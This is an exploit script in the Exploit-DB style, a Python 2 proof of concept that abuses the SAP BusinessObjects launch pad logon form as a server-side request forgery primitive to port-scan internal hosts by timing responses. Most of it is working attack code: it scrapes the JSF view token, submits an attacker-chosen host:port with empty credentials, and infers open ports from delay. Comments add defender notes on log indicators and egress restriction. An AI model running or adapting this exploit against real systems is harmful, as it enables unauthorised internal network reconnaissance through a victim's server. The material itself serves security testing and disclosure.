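# Exploit Title: SAP BusinessObjects launch pad SSRF
# Date: 2017-11-8
# Exploit Author: Ahmad Mahfouz
# Category: Webapps
# Author Homepage: www.unixawy.com
# Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack

#!/usr/bin/env python
# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
# usage : sblpta.py http://path.faces targetIP targetPort
#
# What the script demonstrates:
#   The logon form accepts a caller-supplied "_id0:logon:CMS" value (host:port).
#   The script submits that field with empty credentials and measures how long
#   the server takes to answer. A slow answer is read as "port open" and a fast
#   one as "port closed", i.e. the logon page is used as a server-side request
#   primitive whose response time leaks reachability.
#
# Reviewer notes for defenders (general hardening; confirm against vendor guidance):
#   - Requests of interest in web/application logs are POSTs to the logon
#     ".faces" page whose "_id0:logon:CMS" value is not one of the site's known
#     CMS hosts, especially many such posts with varying host:port values and
#     empty USERNAME/PASSWORD fields.
#   - Restricting outbound connections from the BusinessObjects web tier to the
#     legitimate CMS host(s) removes the value of the timing signal.
#   - Python 2 only (print statements, urllib2).

import urllib2
import urllib
import ssl
from datetime import datetime
import sys

if len(sys.argv) != 4:
    print "Usage: python sblpta.py http://path.faces targetIP targetPort"
    sys.exit(1)

url = sys.argv[1]
targetIP = sys.argv[2]
targetPort = sys.argv[3]
# Value placed in the CMS form field: "host:port".
targetHostIP = "%s:%s" % (targetIP, targetPort)

print "\r\n"
print "[*] SAP BusinessObjects Timing Attack"

headers = {'User-Agent': 'Mozilla/5.0'}
# A bare SSLContext performs no certificate verification and this one pins
# TLSv1; it is only suitable for an authorised test against a lab system.
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)

# Step 1: fetch the logon page to obtain the session cookie and the JSF view token.
try:
    request = urllib2.Request(url, headers=headers)
    page = urllib2.urlopen(request, context=gcontext)
    print "[*] Connected to SAP Bussiness Object %s"  % url
except Exception:
    # Narrowed from a bare "except:" so Ctrl-C / SystemExit are not reported
    # as a connection failure.
    print "[-] Failed To connect to SAP Bussiness Object %s" % url
    print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
    sys.exit(2)

resheaders = page.info()
cookie = resheaders.dict['set-cookie']
content = page.readlines()

# Initialised up front: without this, a page that has no
# "com.sun.faces.VIEW" line raised NameError at the check below instead of
# printing the intended error message.
sfview = None
for line in content:
    if "com.sun.faces.VIEW" in line:
        # Positional parse of the hidden-input markup: fifth "="-separated
        # piece, then the first double-quoted value inside it.
        sfview = line.split("=")[4].split("\"")[1]
        print "[*] Got java faces dynamic value"
    else:
        continue

if not sfview:
    print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
    sys.exit(3)

# Step 2: submit the logon form with the CMS field set to the host:port under
# test and empty credentials.
formdata = {"_id0:logon:CMS": targetHostIP,
            "_id0:logon:USERNAME": "",
            "_id0:logon:PASSWORD": "",
            "com.sun.faces.VIEW": sfview,
            "_id0": "_id0"
            }
data_encode = urllib.urlencode(formdata)

start = datetime.now()
print "[*] Testing Timing Attack %s" % start
request = urllib2.Request(url, data_encode)
request.add_header('Cookie', cookie)
response = urllib2.urlopen(request)
end = datetime.now()
the_page = response.read()

# Step 3: classify by response marker and elapsed time.
# NOTE(review): "FWM" / "FWC" look like error-code prefixes in the returned
# page - confirm against a real response. The 10-second threshold is
# hard-coded and is a heuristic; network latency alone can flip the verdict.
if "FWM" in the_page:
    elapsedTime = end - start
    if elapsedTime.total_seconds() >= 10:
        print "[*] Port %s is Open, Gotcha !!! " % targetPort
    else:
        print "[*] Port %s is Closed , we die fast"  % targetPort
elif "FWC" in the_page:
    print "[-] error login expired"
    sys.exit(10)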